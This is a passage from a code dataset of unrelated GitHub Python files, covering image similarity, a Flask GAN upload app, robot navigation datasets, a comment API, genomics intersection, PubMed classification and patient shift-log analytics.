box[2] * shp[1] * 0.5) # center_x - width /2\n        y1 = int(box[1] * shp[0] - box[3] * shp[0] * 0.5) # center_y - height /2\n        x2 = int(box[0] * shp[1] + box[2] * shp[1] * 0.5) # center_x + width/2\n        y2 = int(box[1] * shp[0] + box[3] * shp[0] * 0.5) # center_y + height/2\n        crop_img = img[y1:y2, x1:x2]\n        return crop_img\n\n    def check_bb_similarity(self, matched_bboxes, img1, pred_bb_1,\n                            img2, pred_bb_2, ssim_bb_thres):\n        ''' return True when every pair of associated bounding boxes is similar (SSIM above threshold)'''\n\n        for idx in range(0, matched_bboxes.shape[0]):\n\n            bb_im_1 = self.get_bb_img(img1, pred_bb_1[matched_bboxes[idx, 0]].tolist())\n            bb_im_2 = self.get_bb_img(img2, pred_bb_2[matched_bboxes[idx, 1]].tolist())\n\n            # for ssim both the bboxes should be of the same dimension\n            # resizing second bbox to the first one\n            bb_im_2 = cv2.resize(bb_im_2, (bb_im_1.shape[1], bb_im_1.shape[0]),\n                                 interpolation=cv2.INTER_AREA)\n\n            # get ssim_score\n            (bb_score, _) = compare_ssim(bb_im_1, bb_im_2,\n                                         multichannel=True, full=True)\n\n            # the ssim score should exceed the threshold score to be similar\n            if bb_score <= ssim_bb_thres:\n                # print('The BBs are not similar')\n                return False\n\n        return True\n\n","repo_name":"kar-ab/image_similarity","sub_path":"bb_utils.py","file_name":"bb_utils.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
{"seq_id":"13346235240","text":"from config import *\nimport datasets\nimport copy\n\n\ndef build_dataset_helper(args, aug, source):\n    if args.datasetType == 'covidx':\n        return datasets.COVIDX(COVIDXConfig, mode=args.mode, source=source, augment=aug)\n    elif args.datasetType == 'chestxray14':\n        return datasets.ChestXRay14(ChestXray14Config, args.mode, source=source, augment=aug)\n    else:\n        raise NotImplementedError\n    \n\n\ndef build_dataset(args, weak_aug=None, strong_aug=None):\n    if args.datasetType == 'assemble':\n        args_temp = copy.deepcopy(args)\n        datasets_assembling = []\n        source = 0\n        for assemble_dataset in assemble_datasets:\n            args_temp.datasetType = assemble_dataset\n            train_set = build_dataset_helper(args_temp, weak_aug, source)\n            source += 1\n            datasets_assembling.append(train_set)\n        train_set = datasets.Assemble(datasets_assembling, augments=[weak_aug, strong_aug])\n    else:\n        # the helper expects the full args namespace and returns a single dataset\n        train_set = build_dataset_helper(args, weak_aug, 0)\n    return train_set","repo_name":"MrGiovanni/LabelAssemble","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"}
{"seq_id":"26035642934","text":"import os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport cv2\nimport torch\nimport torchvision\nimport torchvision.transforms as tt\nfrom torchvision.utils import save_image\nfrom torchvision.transforms import Compose\nimport torch.nn as nn\nfrom torch.nn.utils import spectral_norm\nimport PIL\nfrom PIL import Image\nfrom Model import UNet \nimport pickle \nfrom flask import Flask, flash, render_template, request, url_for\n# please note the import from `flask_uploads` - not `flask_reuploaded`!!\n# this is done on purpose to stay compatible with `Flask-Uploads`\nfrom flask_uploads import IMAGES, UploadSet, configure_uploads\nfrom flask_cors import CORS\n# # Make url public for colab\n# from flask_ngrok import run_with_ngrok\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__, static_folder='generated')\nphotos = 
UploadSet(\"photos\", IMAGES)\napp.config[\"UPLOADED_PHOTOS_DEST\"] = \"images\"\napp.config[\"SECRET_KEY\"] = os.urandom(24)\nconfigure_uploads(app, photos)\n\n\nUPLOAD_FOLDER = './images'\nALLOWED_EXTENSIONS = {'png'}\n\n# app = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\ntest_dir =\"./\"\n\nCORS(app)\n\n# Start ngrok when the app is running\n# run_with_ngrok(app)\n\ndef denorm(img_tensor):\n return img_tensor*0.5 + 0.5\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n# @app.route('/', methods=['GET', 'POST'])\n# def upload_file():\n# if request.method == 'POST':\n# # check if the post request has the file part\n# if 'photo' not in request.files:\n# flash('No file part')\n# return redirect(request.url)\n# photo = request.files['photo']\n# # If the user does not select a file, the browser submits an\n# # empty file without a filename.\n# if photo.filename == '':\n# flash('No selected file')\n# return redirect(request.url)\n# if photo and allowed_file(photo.filename):\n# photoname = secure_filename(photo.filename)\n# photo.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n# return \"Done!!\"\n# return '''\n# \n# Upload new File\n#

Upload new File

\n#
\n# \n# \n#
\n#     '''\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef upload():\n    if request.method == 'POST':\n        print(\"this is request.files:\")\n        print(request.files)\n        if 'photo' in request.files:\n\n            print(\"request has photo!!\")\n            os.system('rm -rf images')\n            os.system('rm -rf generated')\n            os.system('mkdir images')\n            os.system('mkdir generated')\n\n            photo = request.files['photo']\n            filename = secure_filename(photo.filename)\n            photo.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            #photos.save(request.files['photo'])\n            \n            flash(\"Photo saved successfully.\", \"p\")\n            # img = cv2.imread('images/'+str(request.files['photo'].filename))\n            # img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n\n            image = Image.open('./images/'+filename)\n\n            image = image.convert(\"RGB\")\n            transform = Compose([ \n                tt.Resize((256,256),interpolation=Image.ANTIALIAS),\n                tt.CenterCrop(256),\n                tt.ToTensor(),\n                tt.Normalize(mean=(0.5,), std=(0.5,))])\n\n\n            image = transform(image)\n            image = torch.unsqueeze(image, 0)\n\n            # Load pretrained model\n            model = UNet(True)\n            model.load_state_dict(torch.load(\"./generator.pth\",map_location=torch.device('cpu')))\n            # Rather use pickle model\n            # filename = 'model_pickle.sav'\n            # model = pickle.load(open(filename, 'rb'))\n            prediction = model(image).detach()\n            prediction = denorm(prediction.squeeze(0))\n            fname = \"/test-images.png\"\n            save_image(prediction, test_dir + fname)\n            prediction = prediction.permute(1,2,0).numpy()\n            # plt.imshow(image)\n            \n            gen_path_to_save = \"generated/\"+str(request.files['photo'].filename)\n            orig_path_to_save = \"generated/orig\"+str(request.files['photo'].filename)\n            plt.imsave(gen_path_to_save, prediction)\n            plt.imsave(orig_path_to_save, denorm(image.squeeze(0)).permute(1,2,0).numpy())\n            flash(\"Processed Successfully\", \"p\")\n            path_to_save = [orig_path_to_save, gen_path_to_save]\n\n            # return path_to_save[1]\n            return render_template('upload.html', img_path=path_to_save)\n\n        else:\n            return \"'photo' not found in form-data!!\"\n\n    # return prediction\n    print(\"It's a GET request!!\")\n    return render_template('upload.html')\n\nif __name__ == \"__main__\":\n    app.run(debug=True, use_reloader=True, threaded=True)\n    # app.run()\n","repo_name":"akashg71/FloorPlan_GAN-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
{"seq_id":"19876336575","text":"import numpy as np\nimport os\nimport pickle\nimport yaml\nfrom typing import Any, Dict, List, Optional, Tuple\nimport tqdm\nimport io\nimport lmdb\n\nimport torch\nfrom torch.utils.data import Dataset\nimport torchvision.transforms.functional as TF\n\nfrom vint_train.data.data_utils import (\n    img_path_to_data,\n    calculate_sin_cos,\n    get_data_path,\n    to_local_coords,\n)\n\nclass ViNT_Dataset(Dataset):\n    def __init__(\n        self,\n        data_folder: str,\n        data_split_folder: str,\n        dataset_name: str,\n        image_size: Tuple[int, int],\n        waypoint_spacing: int,\n        min_dist_cat: int,\n        max_dist_cat: int,\n        min_action_distance: int,\n        max_action_distance: int,\n        negative_mining: bool,\n        len_traj_pred: int,\n        learn_angle: bool,\n        context_size: int,\n        context_type: str = \"temporal\",\n        end_slack: int = 0,\n        goals_per_obs: int = 1,\n        normalize: bool = True,\n        obs_type: str = \"image\",\n        goal_type: str = \"image\",\n    ):\n        \"\"\"\n        Main ViNT dataset class\n\n        Args:\n            data_folder (string): Directory with all the image data\n            data_split_folder (string): Directory with filepaths.txt, a list of all 
trajectory names in the dataset split that are each separated by a newline\n            dataset_name (string): Name of the dataset [recon, go_stanford, scand, tartandrive, etc.]\n            image_size (Tuple[int, int]): Size to which loaded images are resized\n            waypoint_spacing (int): Spacing between waypoints\n            min_dist_cat (int): Minimum distance category to use\n            max_dist_cat (int): Maximum distance category to use\n            min_action_distance (int): Minimum goal distance (in waypoint steps) for which action labels are supervised\n            max_action_distance (int): Maximum goal distance (in waypoint steps) for which action labels are supervised\n            negative_mining (bool): Whether to use negative mining from the ViNG paper (Shah et al.) (https://arxiv.org/abs/2012.09812)\n            len_traj_pred (int): Length of trajectory of waypoints to predict if this is an action dataset\n            learn_angle (bool): Whether to learn the yaw of the robot at each predicted waypoint if this is an action dataset\n            context_size (int): Number of previous observations to use as context\n            context_type (str): Whether to use temporal, randomized, or randomized temporal context\n            end_slack (int): Number of timesteps to ignore at the end of the trajectory\n            goals_per_obs (int): Number of goals to sample per observation\n            normalize (bool): Whether to normalize the distances or actions\n            obs_type (str): What data type to use for the observation\n            goal_type (str): What data type to use for the goal. The only one supported is \"image\" for now.\n        \"\"\"\n        self.data_folder = data_folder\n        self.data_split_folder = data_split_folder\n        self.dataset_name = dataset_name\n        \n        traj_names_file = os.path.join(data_split_folder, \"traj_names.txt\")\n        with open(traj_names_file, \"r\") as f:\n            file_lines = f.read()\n        self.traj_names = file_lines.split(\"\\n\")\n        if \"\" in self.traj_names:\n            self.traj_names.remove(\"\")\n\n        self.image_size = image_size\n        self.waypoint_spacing = waypoint_spacing\n        self.distance_categories = list(\n            range(min_dist_cat, max_dist_cat + 1, self.waypoint_spacing)\n        )\n        self.min_dist_cat = self.distance_categories[0]\n        self.max_dist_cat = self.distance_categories[-1]\n        self.negative_mining = negative_mining\n        if self.negative_mining:\n            self.distance_categories.append(-1)\n        self.len_traj_pred = len_traj_pred\n        self.learn_angle = learn_angle\n\n        self.min_action_distance = min_action_distance\n        self.max_action_distance = max_action_distance\n\n        self.context_size = context_size\n        assert context_type in {\n            \"temporal\",\n            \"randomized\",\n            \"randomized_temporal\",\n        }, \"context_type must be one of temporal, randomized, randomized_temporal\"\n        self.context_type = context_type\n        self.end_slack = end_slack\n        self.goals_per_obs = goals_per_obs\n        self.normalize = normalize\n        self.obs_type = obs_type\n        self.goal_type = goal_type\n\n        # load data/data_config.yaml\n        with open(\n            os.path.join(os.path.dirname(__file__), \"data_config.yaml\"), \"r\"\n        ) as f:\n            all_data_config = yaml.safe_load(f)\n        assert (\n            self.dataset_name in all_data_config\n        ), f\"Dataset {self.dataset_name} not found in data_config.yaml\"\n        dataset_names = list(all_data_config.keys())\n        dataset_names.sort()\n        # use this index to retrieve the dataset name from the data_config.yaml\n        self.dataset_index = dataset_names.index(self.dataset_name)\n        self.data_config = all_data_config[self.dataset_name]\n        self.trajectory_cache = {}\n        self._load_index()\n        self._build_caches()\n        \n        if self.learn_angle:\n            self.num_action_params = 3\n        else:\n            self.num_action_params = 2\n\n    def __getstate__(self):\n        state = self.__dict__.copy()\n        state[\"_image_cache\"] = None\n        return state\n    \n    def __setstate__(self, state):\n        self.__dict__ = state\n        self._build_caches()\n\n    def _build_caches(self, use_tqdm: bool = True):\n        \"\"\"\n        Build a cache of images for faster loading using LMDB\n        \"\"\"\n        cache_filename = os.path.join(\n            self.data_split_folder,\n            
f\"dataset_{self.dataset_name}.lmdb\",\n )\n\n # Load all the trajectories into memory. These should already be loaded, but just in case.\n for traj_name in self.traj_names:\n self._get_trajectory(traj_name)\n\n \"\"\"\n If the cache file doesn't exist, create it by iterating through the dataset and writing each image to the cache\n \"\"\"\n if not os.path.exists(cache_filename):\n tqdm_iterator = tqdm.tqdm(\n self.goals_index,\n disable=not use_tqdm,\n dynamic_ncols=True,\n desc=f\"Building LMDB cache for {self.dataset_name}\"\n )\n with lmdb.open(cache_filename, map_size=2**40) as image_cache:\n with image_cache.begin(write=True) as txn:\n for traj_name, time in tqdm_iterator:\n image_path = get_data_path(self.data_folder, traj_name, time)\n with open(image_path, \"rb\") as f:\n txn.put(image_path.encode(), f.read())\n\n # Reopen the cache file in read-only mode\n self._image_cache: lmdb.Environment = lmdb.open(cache_filename, readonly=True)\n\n def _build_index(self, use_tqdm: bool = False):\n \"\"\"\n Build an index consisting of tuples (trajectory name, time, max goal distance)\n \"\"\"\n samples_index = []\n goals_index = []\n\n for traj_name in tqdm.tqdm(self.traj_names, disable=not use_tqdm, dynamic_ncols=True):\n traj_data = self._get_trajectory(traj_name)\n traj_len = len(traj_data[\"position\"])\n\n for goal_time in range(0, traj_len):\n goals_index.append((traj_name, goal_time))\n\n begin_time = self.context_size * self.waypoint_spacing\n end_time = traj_len - self.end_slack - self.len_traj_pred * self.waypoint_spacing\n for curr_time in range(begin_time, end_time):\n max_goal_distance = min(self.max_dist_cat * self.waypoint_spacing, traj_len - curr_time - 1)\n samples_index.append((traj_name, curr_time, max_goal_distance))\n\n return samples_index, goals_index\n\n def _sample_goal(self, trajectory_name, curr_time, max_goal_dist):\n \"\"\"\n Sample a goal from the future in the same trajectory.\n Returns: (trajectory_name, goal_time, goal_is_negative)\n \"\"\"\n goal_offset = np.random.randint(0, max_goal_dist + 1)\n if goal_offset == 0:\n trajectory_name, goal_time = self._sample_negative()\n return trajectory_name, goal_time, True\n else:\n goal_time = curr_time + int(goal_offset * self.waypoint_spacing)\n return trajectory_name, goal_time, False\n\n def _sample_negative(self):\n \"\"\"\n Sample a goal from a (likely) different trajectory.\n \"\"\"\n return self.goals_index[np.random.randint(0, len(self.goals_index))]\n\n def _load_index(self) -> None:\n \"\"\"\n Generates a list of tuples of (obs_traj_name, goal_traj_name, obs_time, goal_time) for each observation in the dataset\n \"\"\"\n index_to_data_path = os.path.join(\n self.data_split_folder,\n f\"dataset_dist_{self.min_dist_cat}_to_{self.max_dist_cat}_context_{self.context_type}_n{self.context_size}_slack_{self.end_slack}.pkl\",\n )\n try:\n # load the index_to_data if it already exists (to save time)\n with open(index_to_data_path, \"rb\") as f:\n self.index_to_data, self.goals_index = pickle.load(f)\n except:\n # if the index_to_data file doesn't exist, create it\n self.index_to_data, self.goals_index = self._build_index()\n with open(index_to_data_path, \"wb\") as f:\n pickle.dump((self.index_to_data, self.goals_index), f)\n\n def _load_image(self, trajectory_name, time):\n image_path = get_data_path(self.data_folder, trajectory_name, time)\n\n try:\n with self._image_cache.begin() as txn:\n image_buffer = txn.get(image_path.encode())\n image_bytes = bytes(image_buffer)\n image_bytes = io.BytesIO(image_bytes)\n 
return img_path_to_data(image_bytes, self.image_size)\n except TypeError:\n print(f\"Failed to load image {image_path}\")\n\n def _compute_actions(self, traj_data, curr_time, goal_time):\n start_index = curr_time\n end_index = curr_time + self.len_traj_pred * self.waypoint_spacing + 1\n yaw = traj_data[\"yaw\"][start_index:end_index:self.waypoint_spacing]\n positions = traj_data[\"position\"][start_index:end_index:self.waypoint_spacing]\n goal_pos = traj_data[\"position\"][min(goal_time, len(traj_data[\"position\"]) - 1)]\n\n if len(yaw.shape) == 2:\n yaw = yaw.squeeze(1)\n\n if yaw.shape != (self.len_traj_pred + 1,):\n const_len = self.len_traj_pred + 1 - yaw.shape[0]\n yaw = np.concatenate([yaw, np.repeat(yaw[-1], const_len)])\n positions = np.concatenate([positions, np.repeat(positions[-1][None], const_len, axis=0)], axis=0)\n\n assert yaw.shape == (self.len_traj_pred + 1,), f\"{yaw.shape} and {(self.len_traj_pred + 1,)} should be equal\"\n assert positions.shape == (self.len_traj_pred + 1, 2), f\"{positions.shape} and {(self.len_traj_pred + 1, 2)} should be equal\"\n\n waypoints = to_local_coords(positions, positions[0], yaw[0])\n goal_pos = to_local_coords(goal_pos, positions[0], yaw[0])\n\n assert waypoints.shape == (self.len_traj_pred + 1, 2), f\"{waypoints.shape} and {(self.len_traj_pred + 1, 2)} should be equal\"\n\n if self.learn_angle:\n yaw = yaw[1:] - yaw[0]\n actions = np.concatenate([waypoints[1:], yaw[:, None]], axis=-1)\n else:\n actions = waypoints[1:]\n \n if self.normalize:\n actions[:, :2] /= self.data_config[\"metric_waypoint_spacing\"] * self.waypoint_spacing\n goal_pos /= self.data_config[\"metric_waypoint_spacing\"] * self.waypoint_spacing\n\n assert actions.shape == (self.len_traj_pred, self.num_action_params), f\"{actions.shape} and {(self.len_traj_pred, self.num_action_params)} should be equal\"\n\n return actions, goal_pos\n \n def _get_trajectory(self, trajectory_name):\n if trajectory_name in self.trajectory_cache:\n return self.trajectory_cache[trajectory_name]\n else:\n with open(os.path.join(self.data_folder, trajectory_name, \"traj_data.pkl\"), \"rb\") as f:\n traj_data = pickle.load(f)\n self.trajectory_cache[trajectory_name] = traj_data\n return traj_data\n\n def __len__(self) -> int:\n return len(self.index_to_data)\n\n def __getitem__(self, i: int) -> Tuple[torch.Tensor]:\n \"\"\"\n Args:\n i (int): index to ith datapoint\n Returns:\n Tuple of tensors containing the context, observation, goal, transformed context, transformed observation, transformed goal, distance label, and action label\n obs_image (torch.Tensor): tensor of shape [3, H, W] containing the image of the robot's observation\n goal_image (torch.Tensor): tensor of shape [3, H, W] containing the subgoal image \n dist_label (torch.Tensor): tensor of shape (1,) containing the distance labels from the observation to the goal\n action_label (torch.Tensor): tensor of shape (5, 2) or (5, 4) (if training with angle) containing the action labels from the observation to the goal\n which_dataset (torch.Tensor): index of the datapoint in the dataset [for identifying the dataset for visualization when using multiple datasets]\n \"\"\"\n f_curr, curr_time, max_goal_dist = self.index_to_data[i]\n f_goal, goal_time, goal_is_negative = self._sample_goal(f_curr, curr_time, max_goal_dist)\n\n # Load images\n context = []\n if self.context_type == \"temporal\":\n # sample the last self.context_size times from interval [0, curr_time)\n context_times = list(\n range(\n curr_time + -self.context_size * 
self.waypoint_spacing,\n curr_time + 1,\n self.waypoint_spacing,\n )\n )\n context = [(f_curr, t) for t in context_times]\n else:\n raise ValueError(f\"Invalid context type {self.context_type}\")\n\n obs_image = torch.cat([\n self._load_image(f, t) for f, t in context\n ])\n\n # Load goal image\n goal_image = self._load_image(f_goal, goal_time)\n\n # Load other trajectory data\n curr_traj_data = self._get_trajectory(f_curr)\n curr_traj_len = len(curr_traj_data[\"position\"])\n assert curr_time < curr_traj_len, f\"{curr_time} and {curr_traj_len}\"\n\n goal_traj_data = self._get_trajectory(f_goal)\n goal_traj_len = len(goal_traj_data[\"position\"])\n assert goal_time < goal_traj_len, f\"{goal_time} an {goal_traj_len}\"\n\n # Compute actions\n actions, goal_pos = self._compute_actions(curr_traj_data, curr_time, goal_time)\n \n # Compute distances\n if goal_is_negative:\n distance = self.max_dist_cat\n else:\n distance = (goal_time - curr_time) // self.waypoint_spacing\n assert (goal_time - curr_time) % self.waypoint_spacing == 0, f\"{goal_time} and {curr_time} should be separated by an integer multiple of {self.waypoint_spacing}\"\n actions = actions.astype(np.float32) #Nigam\n actions_torch = torch.as_tensor(actions, dtype=torch.float32)\n if self.learn_angle:\n actions_torch = calculate_sin_cos(actions_torch)\n \n action_mask = (\n (distance < self.max_action_distance) and\n (distance > self.min_action_distance) and\n (not goal_is_negative)\n )\n goal_pos = goal_pos.astype(np.float32)#Nigam\n return (\n torch.as_tensor(obs_image, dtype=torch.float32),\n torch.as_tensor(goal_image, dtype=torch.float32),\n actions_torch,\n torch.as_tensor(distance, dtype=torch.int64),\n torch.as_tensor(goal_pos, dtype=torch.float32),\n torch.as_tensor(self.dataset_index, dtype=torch.int64),\n torch.as_tensor(action_mask, dtype=torch.float32),\n )\n","repo_name":"NigamKatta/Nomad","sub_path":"train/vint_train/data/vint_dataset.py","file_name":"vint_dataset.py","file_ext":"py","file_size_in_byte":15787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21669560423","text":"from flask import request\nfrom flask_restful import Resource\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\nfrom ..models import post, profile\nfrom ..models.embedded_profile import EmbeddedProfile\nfrom ..models.comment import Comment, SubComment\nfrom ..errors import (InternalServerError)\n\nentities = {\n \"profile\": profile.UserProfile,\n \"post\": post.Post\n}\n\n\nclass CommentApi(Resource):\n\n @jwt_required\n def post(self):\n body = request.get_json()\n comment_type = body['type']\n element_id = body['id']\n entity = entities[comment_type].objects.get(id=element_id)\n try:\n if comment_type == 'sub_comment':\n Comment.comments.append(\n SubComment(\n comment_by=EmbeddedProfile(**body['user']),\n comment=body['comment'],\n )\n )\n else:\n entity.comments.append(\n Comment(\n comment_by=EmbeddedProfile(**body['user']),\n comment=body['comment'],\n )\n )\n except Exception:\n raise InternalServerError\n\n return {}, 200\n\n def put(self):\n pass\n\n\nroutes = []\n","repo_name":"sandergv/Musicom_api","sub_path":"musicom/api/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"33223228968","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 21 22:04:52 2019\n\n@author: 
davidnoble\n\"\"\"\n\nimport pandas as pd\nimport pybedtools as bd\n\n# accessing BED files of PacBio sequencing data and annotated genome\nsequences = bd.BedTool('pacbio-190731-facs-assign.bed')\nannotations = bd.BedTool('saccharomyces_cerevisiae.bed')\n\nfragment_peaks = pd.read_csv('joint-frag-mle-peak.csv')\n\n# finding overlap, where entirety of item from SEQUENCES has overlap with item in ANNOTATIONS\n# some will still span introns, due to nature of ANNOTATIONS data\nintersections = sequences.intersect(annotations, f=1.0, wo=True, nonamecheck=True).to_dataframe()\n\n# creating DataFrames from BedTool objects (for ease)\nsequences = sequences.to_dataframe(names = ['chrom', 'start', 'end', \n 'barcode', 'num_reads', 'strand'])\nannotations = annotations.to_dataframe()\n\ncols=[6,10,11,12,13,14]\nintersects = intersections.drop(intersections.columns[cols], axis=1)\nintersects.columns = ['chrom','start','end','barcode','num_reads',\n 'strand','geneStart','geneEnd','yorf','exons',\n 'exonLengths','exonStarts','overlap']\n\nin_frame = intersects[(intersects['start'] - intersects['geneStart']) % 3 == 0]\nprint(in_frame.head()['exonStarts'])","repo_name":"dvdnobl/protein-coordinates","sub_path":"Fragment_coordinates/protein_coordinates.py","file_name":"protein_coordinates.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"37133571499","text":"from collections import Counter\nimport pickle\nfrom Bio import Entrez, Medline\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom utils import abstract2words\n\nEntrez.email = 'hsiaoyi0504@gmail.com'\n\n\ndef get_abstracts(file_name):\n pubmed_ids = []\n with open(file_name) as f:\n for line in f:\n pubmed_ids.append(int(line.rstrip('\\n')))\n abstracts = []\n for pubmed_id in pubmed_ids:\n fetch_handler = Entrez.efetch(\n db='pubmed', rettype='medline', retmode='text', id=str(pubmed_id))\n record = Medline.read(fetch_handler)\n abstracts.append(record['AB'])\n return abstracts\n\n\nif __name__ == '__main__':\n pos_abstracts = get_abstracts('positive_examples')\n neg_abstracts = get_abstracts('negative_examples')\n all_abstracts = pos_abstracts + neg_abstracts\n all_words = set()\n for i, a in enumerate(all_abstracts):\n words = abstract2words(a)\n all_words.update(words)\n all_abstracts[i] = words\n word_dict = dict(zip(range(len(all_words)), all_words))\n X = []\n for a in all_abstracts:\n c = Counter(a)\n values = []\n for i in range(len(all_words)):\n values.append(c[word_dict[i]])\n total_words = sum(values)\n values = [v / total_words for v in values]\n X.append(values)\n y = [1] * len(pos_abstracts) + [0] * len(neg_abstracts)\n clf = KNeighborsClassifier(n_neighbors=3)\n clf.fit(X, y)\n pickle.dump([clf, word_dict], open('model.pkl', 'wb'))\n","repo_name":"hsiaoyi0504/related_papers","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"35309649462","text":"from is_pangram import is_pangram\nimport unittest\n\n\nclass Test(unittest.TestCase):\n def test_1(self):\n result = is_pangram(\"The quick, brown fox jumps over the lazy dog!\")\n self.assertEqual(result, True)\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"maltewirz/code-challenges","sub_path":"src/code-challenges/codewars/6KYU/isPangram/test_is_pangram.py","file_name":"test_is_pangram.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"167551146","text":"import sys\nimport pandas as pd\nimport datetime\n\n# pandas settings\npd.options.mode.chained_assignment = None # default='warn\npd.set_option('display.expand_frame_repr', False)\n\nif __name__ == '__main__': # we want to import from same directory if using this\n # module as-is (for debugging mainly, or for loading data in the future)\n sys.path.append(\".\")\n from DAOs.shift_log_DAO import shift_log_DAO\nelse: # if called from index.py\n from DAOs.shift_log_DAO import shift_log_DAO\n\nclass input_shiftlogs(object):\n # input_raw_data = pd.DataFrame()\n sldao = shift_log_DAO()\n input_raw_data = sldao.get_all_logs()\n input_raw_data['datetime'] = pd.to_datetime(input_raw_data['datetime'], format='%Y-%m-%dT%H:%M:%S')\n input_raw_data['food_consumption'] = pd.to_numeric(input_raw_data['food_consumption'])\n input_raw_data['pulse_pressure'] = input_raw_data['systolic_bp'] - input_raw_data['diastolic_bp']\n input_raw_max_date = input_raw_data['datetime'].max()\n input_raw_min_date = input_raw_data['datetime'].min()\n # print(input_raw_data)\n daytime_start = datetime.time(7, 30)\n daytime_end = datetime.time(19, 30)\n\n # changeable parameters NOTE: should be changeable\n para_temperature_max = 37.6\n para_temperature_min = 35.5\n para_temperature_sd = 0.66\n para_pulse_pressure_max = 50\n\n @staticmethod\n def update_shiftlogs_data():\n input_shiftlogs.input_raw_data = input_shiftlogs.sldao.get_all_logs()\n input_shiftlogs.input_raw_data['datetime'] = pd.to_datetime(input_shiftlogs.input_raw_data['datetime'], format='%Y-%m-%dT%H:%M:%S')\n input_shiftlogs.input_raw_data['food_consumption'] = pd.to_numeric(input_shiftlogs.input_raw_data['food_consumption'])\n input_shiftlogs.input_raw_data['pulse_pressure'] = input_shiftlogs.input_raw_data['systolic_bp'] - input_shiftlogs.input_raw_data['diastolic_bp']\n input_shiftlogs.input_raw_max_date = input_shiftlogs.input_raw_data['datetime'].max()\n input_shiftlogs.input_raw_min_date = input_shiftlogs.input_raw_data['datetime'].min()\n\n @staticmethod\n def date_only(original_date):\n return original_date.replace(hour=0, minute=0, second=0, microsecond=0)\n\n @staticmethod\n def get_logs_filter_options():\n '''Returns labels and values in an array of tuples'''\n return [('No. of Falls', 'num_falls'), ('No. 
of Near Falls', 'num_near_falls'),\n ('Food Consumption', 'food_consumption'), ('Temperature', 'temperature'), ('Systolic//Diastolic Bp', 'sys_dia'),\n ('Pulse Pressure', 'pulse_pressure'), ('Pulse Rate', 'pulse_rate')]\n\n @staticmethod\n def get_relevant_data(start_date, end_date, patient_id):\n '''\n Retrieve sensor data based on location, start and end dates, and the device\n grouped=True to get grouped data for toilet visits\n '''\n # TODO: this part probably is the best to convert to retrieve from DB\n relevant_data = input_shiftlogs.input_raw_data.loc[(input_shiftlogs.input_raw_data['patient_id'] == patient_id)\n & (input_shiftlogs.input_raw_data['datetime'] < end_date)\n & (input_shiftlogs.input_raw_data['datetime'] > start_date),\n ['patient_id', 'datetime', 'num_falls', 'num_near_falls', 'food_consumption',\n 'temperature', 'systolic_bp', 'diastolic_bp', 'pulse_pressure', 'pulse_rate']]\n return relevant_data\n\n @staticmethod\n def get_logs_by_date(start_date=input_raw_min_date, end_date=input_raw_max_date,\n patient_id=1, time_period=None):\n \"\"\"\n Function returns dates and aggregated number of times the sensor was activated\n To get day only, use time_period='Day' and to get night_only use time_period='Night'\n \"\"\"\n\n # NOTE: last day of the returned output is not accurate if offset is used because the next day's data is needed to get the current night's data\n current_data = input_shiftlogs.get_relevant_data(start_date, end_date, patient_id)\n # print(current_data)\n\n # print(current_data)\n if time_period == 'Day':\n current_data = current_data.loc[(current_data['datetime'].dt.time >= input_shiftlogs.daytime_start)\n & (current_data['datetime'].dt.time < input_shiftlogs.daytime_end)]\n elif time_period == 'Night':\n current_data = current_data.loc[(current_data['datetime'].dt.time < input_shiftlogs.daytime_start)\n | (current_data['datetime'].dt.time > input_shiftlogs.daytime_end)]\n\n # group by date only\n current_data['date_only'] = current_data['datetime'].apply(input_shiftlogs.date_only)\n result_data = current_data.groupby(['date_only'], as_index=False)[\n 'num_falls', 'num_near_falls', 'food_consumption', 'temperature', 'systolic_bp', 'diastolic_bp', 'pulse_pressure', 'pulse_rate'].mean()\n\n # add 0 for days with no data\n result_data.set_index('date_only', inplace=True)\n if isinstance(start_date, str):\n start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')\n\n if isinstance(end_date, str):\n end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d')\n\n all_days_range = pd.date_range(start_date.date(), end_date.date() + datetime.timedelta(days=-1), freq='D')\n try:\n result_data = result_data.loc[all_days_range]\n except KeyError as e:\n erroroutput = pd.DataFrame()\n erroroutput['num_falls'] = []\n erroroutput['num_near_falls'] = []\n erroroutput['food_consumption'] = []\n erroroutput['temperature'] = []\n erroroutput['systolic_bp'] = []\n erroroutput['diastolic_bp'] = []\n erroroutput['pulse_pressure'] = []\n erroroutput['pulse_rate'] = []\n erroroutput['date_only'] = []\n result_data.fillna(0, inplace=True)\n\n # undo set index\n result_data.reset_index(inplace=True)\n result_data.rename(columns={'index': 'date_only'}, inplace=True)\n # print(\"result data from 